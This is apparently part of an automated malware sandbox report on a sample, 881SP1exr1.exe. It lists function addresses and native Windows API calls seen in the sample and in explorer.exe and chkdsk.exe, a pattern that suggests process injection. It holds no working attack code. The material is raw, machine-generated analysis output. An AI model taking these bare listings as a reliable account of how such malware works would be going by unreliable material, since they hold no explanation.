          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410CF22_2_01410CF2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C0CB52_2_014C0CB5
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01494F402_2_01494F40
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01462F282_2_01462F28
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01440F302_2_01440F30
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C2F302_2_014C2F30
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01412FC82_2_01412FC8
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149EFA02_2_0149EFA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420E592_2_01420E59
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DEE262_2_014DEE26
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DEEDB2_2_014DEEDB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432E902_2_01432E90
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DCE932_2_014DCE93
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014EB16B2_2_014EB16B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0145516C2_2_0145516C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140F1722_2_0140F172
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142B1B02_2_0142B1B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CF0CC2_2_014CF0CC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014270C02_2_014270C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D70E92_2_014D70E9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DF0E02_2_014DF0E0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140D34C2_2_0140D34C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D132D2_2_014D132D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0146739A2_2_0146739A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143B2C02_2_0143B2C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C12ED2_2_014C12ED
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143D2F02_2_0143D2F0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014252A02_2_014252A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D75712_2_014D7571
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E95C32_2_014E95C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BD5B02_2_014BD5B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014114602_2_01411460
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DF43F2_2_014DF43F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DF7B02_2_014DF7B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014656302_2_01465630
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D16CC2_2_014D16CC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014299502_2_01429950
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143B9502_2_0143B950
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B59102_2_014B5910
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148D8002_2_0148D800
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014238E02_2_014238E0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DFB762_2_014DFB76
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01495BF02_2_01495BF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0145DBF92_2_0145DBF9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143FB802_2_0143FB80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DFA492_2_014DFA49
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D7A462_2_014D7A46
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01493A6C2_2_01493A6C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CDAC62_2_014CDAC6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01465AA02_2_01465AA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BDAAC2_2_014BDAAC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C1AA32_2_014C1AA3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01423D402_2_01423D40
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D1D5A2_2_014D1D5A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D7D732_2_014D7D73
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143FDC02_2_0143FDC0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01499C322_2_01499C32
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DFCF22_2_014DFCF2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DFF092_2_014DFF09
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01421F922_2_01421F92
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_013E3FD52_2_013E3FD5
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_013E3FD22_2_013E3FD2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DFFB12_2_014DFFB1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01429EB02_2_01429EB0
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D82323_2_0E5D8232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D70363_2_0E5D7036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5CE0823_2_0E5CE082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D59123_2_0E5D5912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5CFD023_2_0E5CFD02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D2B303_2_0E5D2B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D2B323_2_0E5D2B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5DB5CD3_2_0E5DB5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F43BB323_2_0F43BB32
          Source: C:\Windows\explorer.exeCode function: 3_2_0F43BB303_2_0F43BB30
          Source: C:\Windows\explorer.exeCode function: 3_2_0F4412323_2_0F441232
          Source: C:\Windows\explorer.exeCode function: 3_2_0F438D023_2_0F438D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0F43E9123_2_0F43E912
          Source: C:\Windows\explorer.exeCode function: 3_2_0F4445CD3_2_0F4445CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0F4400363_2_0F440036
          Source: C:\Windows\explorer.exeCode function: 3_2_0F4370823_2_0F437082
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059D05914_2_059D0591
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059105354_2_05910535
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059BE4F64_2_059BE4F6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059B44204_2_059B4420
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C24464_2_059C2446
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0590C7C04_2_0590C7C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059347504_2_05934750
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059107704_2_05910770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0592C6E04_2_0592C6E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059D01AA4_2_059D01AA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C41A24_2_059C41A2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C81CC4_2_059C81CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059AA1184_2_059AA118
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059001004_2_05900100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059981584_2_05998158
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059A20004_2_059A2000
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0591E3F04_2_0591E3F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059D03E64_2_059D03E6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CA3524_2_059CA352
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059902C04_2_059902C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059B02744_2_059B0274
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05928DBF4_2_05928DBF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0590ADE04_2_0590ADE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059ACD1F4_2_059ACD1F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0591AD004_2_0591AD00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059B0CB54_2_059B0CB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05900CF24_2_05900CF2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05910C004_2_05910C00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0598EFA04_2_0598EFA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05902FC84_2_05902FC8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05930F304_2_05930F30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059B2F304_2_059B2F30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05952F284_2_05952F28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05984F404_2_05984F40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05922E904_2_05922E90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CCE934_2_059CCE93
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CEEDB4_2_059CEEDB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CEE264_2_059CEE26
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05910E594_2_05910E59
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059129A04_2_059129A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059DA9A64_2_059DA9A6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059269624_2_05926962
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_058F68B84_2_058F68B8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0593E8F04_2_0593E8F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0591A8404_2_0591A840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059128404_2_05912840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C6BD74_2_059C6BD7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CAB404_2_059CAB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0590EA804_2_0590EA80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059AD5B04_2_059AD5B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059D95C34_2_059D95C3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C75714_2_059C7571
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CF43F4_2_059CF43F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059014604_2_05901460
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CF7B04_2_059CF7B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C16CC4_2_059C16CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059556304_2_05955630
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0591B1B04_2_0591B1B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059DB16B4_2_059DB16B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0594516C4_2_0594516C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_058FF1724_2_058FF172
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059170C04_2_059170C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059BF0CC4_2_059BF0CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C70E94_2_059C70E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CF0E04_2_059CF0E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0595739A4_2_0595739A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C132D4_2_059C132D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_058FD34C4_2_058FD34C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059152A04_2_059152A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0592B2C04_2_0592B2C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0592D2F04_2_0592D2F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059B12ED4_2_059B12ED
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0592FDC04_2_0592FDC0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C1D5A4_2_059C1D5A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05913D404_2_05913D40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C7D734_2_059C7D73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CFCF24_2_059CFCF2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05989C324_2_05989C32
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05911F924_2_05911F92
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CFFB14_2_059CFFB1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_058D3FD54_2_058D3FD5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_058D3FD24_2_058D3FD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CFF094_2_059CFF09
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05919EB04_2_05919EB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059A59104_2_059A5910
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059199504_2_05919950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0592B9504_2_0592B950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059138E04_2_059138E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0597D8004_2_0597D800
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0592FB804_2_0592FB80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05985BF04_2_05985BF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0594DBF94_2_0594DBF9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CFB764_2_059CFB76
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05955AA04_2_05955AA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059ADAAC4_2_059ADAAC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059B1AA34_2_059B1AA3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059BDAC64_2_059BDAC6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059CFA494_2_059CFA49
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059C7A464_2_059C7A46
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05983A6C4_2_05983A6C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505E0064_2_0505E006
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05042D874_2_05042D87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05042D904_2_05042D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05042FB04_2_05042FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505D5634_2_0505D563
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05049E504_2_05049E50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_0505DE6A4_2_0505DE6A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05957E54 appears 107 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0597EA12 appears 86 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05945130 appears 58 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 058FB970 appears 262 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0598F290 appears 103 times
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: String function: 01455130 appears 58 times
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: String function: 0149F290 appears 103 times
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: String function: 0148EA12 appears 86 times
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: String function: 0140B970 appears 262 times
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: String function: 01467E54 appears 107 times
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A31B NtCreateFile,2_2_0041A31B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A44A NtReadFile,NtClose,2_2_0041A44A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0041A4FB NtAllocateVirtualMemory,2_2_0041A4FB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452B60 NtClose,LdrInitializeThunk,2_2_01452B60
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01452BF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452AD0 NtReadFile,LdrInitializeThunk,2_2_01452AD0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01452D10
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01452D30
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452DD0 NtDelayExecution,LdrInitializeThunk,2_2_01452DD0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01452DF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01452C70
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01452CA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452F30 NtCreateSection,LdrInitializeThunk,2_2_01452F30
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452FE0 NtCreateFile,LdrInitializeThunk,2_2_01452FE0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01452F90
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452FB0 NtResumeThread,LdrInitializeThunk,2_2_01452FB0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01452E80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01452EA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01454340 NtSetContextThread,2_2_01454340
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01454650 NtSuspendThread,2_2_01454650
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452BE0 NtQueryValueKey,2_2_01452BE0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452B80 NtQueryInformationFile,2_2_01452B80
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452BA0 NtEnumerateValueKey,2_2_01452BA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452AF0 NtWriteFile,2_2_01452AF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452AB0 NtWaitForSingleObject,2_2_01452AB0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452D00 NtSetInformationFile,2_2_01452D00
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452DB0 NtEnumerateKey,2_2_01452DB0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452C60 NtCreateKey,2_2_01452C60
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452C00 NtQueryInformationProcess,2_2_01452C00
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452CC0 NtQueryVirtualMemory,2_2_01452CC0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452CF0 NtOpenProcess,2_2_01452CF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452F60 NtCreateProcessEx,2_2_01452F60
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452FA0 NtQuerySection,2_2_01452FA0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452E30 NtWriteVirtualMemory,2_2_01452E30
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452EE0 NtQueueApcThread,2_2_01452EE0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01453010 NtOpenDirectoryObject,2_2_01453010
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01453090 NtSetValueKey,2_2_01453090
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014535C0 NtCreateMutant,2_2_014535C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014539B0 NtGetContextThread,2_2_014539B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01453D70 NtOpenThread,2_2_01453D70
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01453D10 NtOpenProcessToken,2_2_01453D10
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D9E12 NtProtectVirtualMemory,3_2_0E5D9E12
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D8232 NtCreateFile,3_2_0E5D8232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E5D9E0A NtProtectVirtualMemory,3_2_0E5D9E0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942DD0 NtDelayExecution,LdrInitializeThunk,4_2_05942DD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05942DF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942D10 NtMapViewOfSection,LdrInitializeThunk,4_2_05942D10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_05942CA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05942C70
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942C60 NtCreateKey,LdrInitializeThunk,4_2_05942C60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942FE0 NtCreateFile,LdrInitializeThunk,4_2_05942FE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942F30 NtCreateSection,LdrInitializeThunk,4_2_05942F30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_05942EA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_05942BF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942BE0 NtQueryValueKey,LdrInitializeThunk,4_2_05942BE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942B60 NtClose,LdrInitializeThunk,4_2_05942B60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942AD0 NtReadFile,LdrInitializeThunk,4_2_05942AD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_059435C0 NtCreateMutant,LdrInitializeThunk,4_2_059435C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05944650 NtSuspendThread,4_2_05944650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05944340 NtSetContextThread,4_2_05944340
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942DB0 NtEnumerateKey,4_2_05942DB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942D00 NtSetInformationFile,4_2_05942D00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942D30 NtUnmapViewOfSection,4_2_05942D30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942CC0 NtQueryVirtualMemory,4_2_05942CC0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942CF0 NtOpenProcess,4_2_05942CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942C00 NtQueryInformationProcess,4_2_05942C00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942F90 NtProtectVirtualMemory,4_2_05942F90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942FB0 NtResumeThread,4_2_05942FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942FA0 NtQuerySection,4_2_05942FA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942F60 NtCreateProcessEx,4_2_05942F60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942E80 NtReadVirtualMemory,4_2_05942E80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942EE0 NtQueueApcThread,4_2_05942EE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942E30 NtWriteVirtualMemory,4_2_05942E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942B80 NtQueryInformationFile,4_2_05942B80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942BA0 NtEnumerateValueKey,4_2_05942BA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942AB0 NtWaitForSingleObject,4_2_05942AB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05942AF0 NtWriteFile,4_2_05942AF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05943090 NtSetValueKey,4_2_05943090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05943010 NtOpenDirectoryObject,4_2_05943010
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_05943D10 NtOpenProcessToken,4_2_05943D10
